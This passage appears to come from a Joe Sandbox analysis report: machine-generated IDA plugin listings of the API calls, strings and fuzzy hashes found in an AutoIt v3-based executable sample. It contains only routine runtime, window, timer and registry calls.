                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0005A0E4
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0005A0F7
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0005A10A
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0005A11D
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0005A130
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0005A143
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0005A156
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0005A169
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0005A17C
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0005A18F
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0005A1A2
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0005A1B5
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0005A1C8
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0005A1DB
                                                • Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0005A1EE
                                              • __mtinitlocks.LIBCMT ref: 00059D1B
                                              • __mtterm.LIBCMT ref: 00059D24
                                                • Part of subcall function 00059D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00059D29,00057EFD,000ECD38,00000014), ref: 00059E86
                                                • Part of subcall function 00059D8C: _free.LIBCMT ref: 00059E8D
                                                • Part of subcall function 00059D8C: DeleteCriticalSection.KERNEL32(000F0C00,?,?,00059D29,00057EFD,000ECD38,00000014), ref: 00059EAF
                                              • __calloc_crt.LIBCMT ref: 00059D49
                                              • __initptd.LIBCMT ref: 00059D6B
                                              • GetCurrentThreadId.KERNEL32 ref: 00059D72
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: bab0df48c7c1af4fd30e9d077d7157f76d537000a3a9d7c263bfbcb0948a9057
                                              • Instruction ID: 3365fdfbad8c210d5f54953fa14cd26a2710d948fcfbc93574c77a414c909097
                                              • Opcode Fuzzy Hash: bab0df48c7c1af4fd30e9d077d7157f76d537000a3a9d7c263bfbcb0948a9057
                                              • Instruction Fuzzy Hash: 10F06D32619712DAFB747B74BC036DB6AE4DB41772F204729FC50D50D3EF10890982A1
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00045109
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0004512A
                                              • ShowWindow.USER32(00000000), ref: 0004513E
                                              • ShowWindow.USER32(00000000), ref: 00045147
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: c4e6d5ac7e0fa384de9deef380ab642ae6e32e728f4d8885d2f571caa06becc5
                                              • Instruction ID: 2ccfc5c54116fd68ba471b92784cdb782c5b9db36c75fe1f8055875d8fbe72c4
                                              • Opcode Fuzzy Hash: c4e6d5ac7e0fa384de9deef380ab642ae6e32e728f4d8885d2f571caa06becc5
                                              • Instruction Fuzzy Hash: B3F0B771945294BAFA711727AC48E3B3E7DD7C6F50F00011EB908A65A0C6691851EAB1
                                              APIs
                                                • Part of subcall function 00044A8C: _fseek.LIBCMT ref: 00044AA4
                                                • Part of subcall function 00099CF1: _wcscmp.LIBCMT ref: 00099DE1
                                                • Part of subcall function 00099CF1: _wcscmp.LIBCMT ref: 00099DF4
                                              • _free.LIBCMT ref: 00099C5F
                                              • _free.LIBCMT ref: 00099C66
                                              • _free.LIBCMT ref: 00099CD1
                                                • Part of subcall function 00052F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052F99
                                                • Part of subcall function 00052F85: GetLastError.KERNEL32(00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052FAB
                                              • _free.LIBCMT ref: 00099CD9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 1552873950-2806939583
                                              • Opcode ID: 6e0f23a6701a1578c5aad48b9f45db8bdf550c83a7d4e8de24b6be8fbbf0affa
                                              • Instruction ID: ba2e707fe5a51d3eb44e803a1ecdc3ecd29629b42aafedb12bd5b8120b5ff7aa
                                              • Opcode Fuzzy Hash: 6e0f23a6701a1578c5aad48b9f45db8bdf550c83a7d4e8de24b6be8fbbf0affa
                                              • Instruction Fuzzy Hash: D5515BB1904259AFDF249F64DC41AEEBBB9FF48304F0004AEB649A3242DB715A94CF59
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                              • Instruction ID: d68d1a7ccfd875965e6adb5307bd5c0f347dedeb7f9466e717c31fc8a992a5e6
                                              • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                              • Instruction Fuzzy Hash: B351EF30A04B49DBDB248EA9DCA46AF77F5AF08323F248769FC25972D1D7709D588B40
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000352E6
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003534A
                                              • TranslateMessage.USER32(?), ref: 00035356
                                              • DispatchMessageW.USER32(?), ref: 00035360
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchTranslate
                                              • String ID:
                                              • API String ID: 1795658109-0
                                              • Opcode ID: e1bef0330228b6c5af29d87c54f66e053925cfefbdac4fe85cf9c948e34f68e9
                                              • Instruction ID: e7bba6337ec5288e4591b120ac2a122d2c19d0a692a4b8d4683ec010490b7de1
                                              • Opcode Fuzzy Hash: e1bef0330228b6c5af29d87c54f66e053925cfefbdac4fe85cf9c948e34f68e9
                                              • Instruction Fuzzy Hash: 21312630A08B06DBFBB28B64DC44FBA77FC9B01345F14006AE426875F1D7B9A985E752
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0009581B
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00095829
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00095831
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0009583B
                                              • Sleep.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00095877
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 55a6072b4d62a1c938715f28eb3011a016e7690ebd5b4114f9a54209152779fa
                                              • Instruction ID: efa80cfab31ab9c8157bf8b9f920afb35897a5ad5d6cc9fc321f518d35a5b6bf
                                              • Opcode Fuzzy Hash: 55a6072b4d62a1c938715f28eb3011a016e7690ebd5b4114f9a54209152779fa
                                              • Instruction Fuzzy Hash: D8015771C01A19DBEF009FEAEC48AEEBBB8BB0C712F114156E901B2140CF349550DBA1
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00031275,SwapMouseButtons,00000004,?), ref: 000312A8
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00031275,SwapMouseButtons,00000004,?), ref: 000312C9
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00031275,SwapMouseButtons,00000004,?), ref: 000312EB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 1990f061bdca1019612336d8b3d2b77f321cd93d9df41b3fdecec133b90086b2
                                              • Instruction ID: 6176f820b31448ef6aa525d341e9889d06d2f5e88a89cb928018b2129adf51ce
                                              • Opcode Fuzzy Hash: 1990f061bdca1019612336d8b3d2b77f321cd93d9df41b3fdecec133b90086b2
                                              • Instruction Fuzzy Hash: 47111575614208FFEB218FA4DC84EEFBBBCEF09741F104569E805E7210E6719E509BA0
                                              APIs
                                              • _memset.LIBCMT ref: 00045B58
                                                • Part of subcall function 000456F8: _memset.LIBCMT ref: 00045787
                                                • Part of subcall function 000456F8: _wcscpy.LIBCMT ref: 000457DB
                                                • Part of subcall function 000456F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000457EB
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00045BAD
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00045BBC
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00080D7C
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: ad0f2b8503943c5fc8f38344fdf1edef7f5e659937ba89abb4bb68cdf0a59b7e
                                              • Instruction ID: cb66d12a97abbeb3d9b4339955df3d19fc3f780d57ab0a303b4afbb0de7a9613
                                              • Opcode Fuzzy Hash: ad0f2b8503943c5fc8f38344fdf1edef7f5e659937ba89abb4bb68cdf0a59b7e
                                              • Instruction Fuzzy Hash: AF210AB09047849FE7B29B248C95FEBBBECAF01305F00049DE6DD57182C3742988CB85
                                              APIs
                                                • Part of subcall function 000449C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,000427AF,?,00000001), ref: 000449F4
                                              • _free.LIBCMT ref: 0007FB04
                                              • _free.LIBCMT ref: 0007FB4B
                                                • Part of subcall function 000429BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00042ADF
                                              Strings
                                              • Bad directive syntax error, xrefs: 0007FB33
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: Bad directive syntax error
                                              • API String ID: 2861923089-2118420937
                                              • Opcode ID: 9c263acf90c182d8c6f78126cd44a87562d1b447c934648a43ad6272db8a636e
                                              • Instruction ID: 092eb1fd74eefa93d6feec835a028e2b3589761e852520520cf5c36e62b85d37
                                              • Opcode Fuzzy Hash: 9c263acf90c182d8c6f78126cd44a87562d1b447c934648a43ad6272db8a636e
                                              • Instruction Fuzzy Hash: A0916EB1D1021AAFCF14EFA4C8919EEB7B4FF05310F14857AF819AB292DB74A905CB54
                                              APIs
                                                • Part of subcall function 00044AB2: __fread_nolock.LIBCMT ref: 00044AD0
                                              • _wcscmp.LIBCMT ref: 00099DE1
                                              • _wcscmp.LIBCMT ref: 00099DF4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: 2fe8026ad8666bd67d105b13ce2db656c4bb0b8530be2431cab76a08efa1a133
                                              • Instruction ID: c390ff84c6df20547ecfadf40fdc6a5b61170b2a0b886ac8c0ebd374882c864b
                                              • Opcode Fuzzy Hash: 2fe8026ad8666bd67d105b13ce2db656c4bb0b8530be2431cab76a08efa1a133
                                              • Instruction Fuzzy Hash: 0341E572A40209BADF20EAA4CC45FEFBBFDEF49714F00047AFA00B7191D671A9049B65
                                              APIs
                                              • _memset.LIBCMT ref: 0008032B
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00080375
                                                • Part of subcall function 00050284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00042A58,?,00008000), ref: 000502A4
                                                • Part of subcall function 000509C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000509E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: 894ed2ecdba00a4ef1a9d8ac7af84c12e2dccace0c7321509e46de17466d7614
                                              • Instruction ID: abe95fd634807d1b96db9f1bd5afc28fc4c86057bb2217198c00148821420381
                                              • Opcode Fuzzy Hash: 894ed2ecdba00a4ef1a9d8ac7af84c12e2dccace0c7321509e46de17466d7614
                                              • Instruction Fuzzy Hash: 5E218471A042889BDB41DF94C845BEE7BF8AF49300F00406AE804A7242DBB95A8CDF91
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cf744b02d9db998a224b4ba7b33b28e8ec1024526a547877b394274008b39e2
                                              • Instruction ID: c0589fb4d0f3624026d92c81a395d4526197454fa29658a1f2d7867a9e74a88f
                                              • Opcode Fuzzy Hash: 6cf744b02d9db998a224b4ba7b33b28e8ec1024526a547877b394274008b39e2
                                              • Instruction Fuzzy Hash: D3F12871A083019FC714DF68C484A6ABBE5FF89314F14892EF89A9B352D730E945CF82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 375adbc4a62f4bea9ab610775eeacea4eaebb844cb9f39939c604d006e1c3bdd
                                              • Instruction ID: 6f95e6c6e7cce629996034b1801edfa72e4c7ca41f63341f2542a58a59b4ae89
                                              • Opcode Fuzzy Hash: 375adbc4a62f4bea9ab610775eeacea4eaebb844cb9f39939c604d006e1c3bdd
                                              • Instruction Fuzzy Hash: 7861AEB1A00209EBDF048F25D880AAE7BB5FF44350F15C1A9EC19CF295EB35DAA0CB55
                                              APIs
                                                • Part of subcall function 000507BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000507EC
                                                • Part of subcall function 000507BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 000507F4
                                                • Part of subcall function 000507BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000507FF
                                                • Part of subcall function 000507BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0005080A
                                                • Part of subcall function 000507BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00050812
                                                • Part of subcall function 000507BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0005081A
                                                • Part of subcall function 0004FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0003AC6B), ref: 0004FFA7
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003AD08
                                              • OleInitialize.OLE32(00000000), ref: 0003AD85
                                              • CloseHandle.KERNEL32(00000000), ref: 00072F56
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: 976f9795cc2f77640b4a88b73c62f92310e6b8d16dfd900cc0dca833e925f50b
                                              • Instruction ID: e068a0cd82742c47a6656848085339af6740d4036822bafd8556b2deb423970a
                                              • Opcode Fuzzy Hash: 976f9795cc2f77640b4a88b73c62f92310e6b8d16dfd900cc0dca833e925f50b
                                              • Instruction Fuzzy Hash: 7081C9B091C2408EE384EF29ED446B97EE8EB88304700816AD51CC7A72E7BC6515FF17
                                              APIs
                                              • _memset.LIBCMT ref: 000459F9
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00045A9E
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00045ABB
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: cde2b107cc401f9eede1a4f0d14d9e62ad3ec887070f97789d07110fac46b430
                                              • Instruction ID: 35fd8c92f21be7980e01abde6d9bc40bfd292c554116002a665ec88a615b8085
                                              • Opcode Fuzzy Hash: cde2b107cc401f9eede1a4f0d14d9e62ad3ec887070f97789d07110fac46b430
                                              • Instruction Fuzzy Hash: F53193B0505B018FD761DF24DC846ABBBE4FB48305F000A3EF59A83282E775A954CB97
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00055953
                                                • Part of subcall function 0005A39B: __NMSG_WRITE.LIBCMT ref: 0005A3C2
                                                • Part of subcall function 0005A39B: __NMSG_WRITE.LIBCMT ref: 0005A3CC
                                              • __NMSG_WRITE.LIBCMT ref: 0005595A
                                                • Part of subcall function 0005A3F8: GetModuleFileNameW.KERNEL32(00000000,000F53BA,00000104,00000004,00000001,00051003), ref: 0005A48A
                                                • Part of subcall function 0005A3F8: ___crtMessageBoxW.LIBCMT ref: 0005A538
                                                • Part of subcall function 000532CF: ___crtCorExitProcess.LIBCMT ref: 000532D5
                                                • Part of subcall function 000532CF: ExitProcess.KERNEL32 ref: 000532DE
                                                • Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58
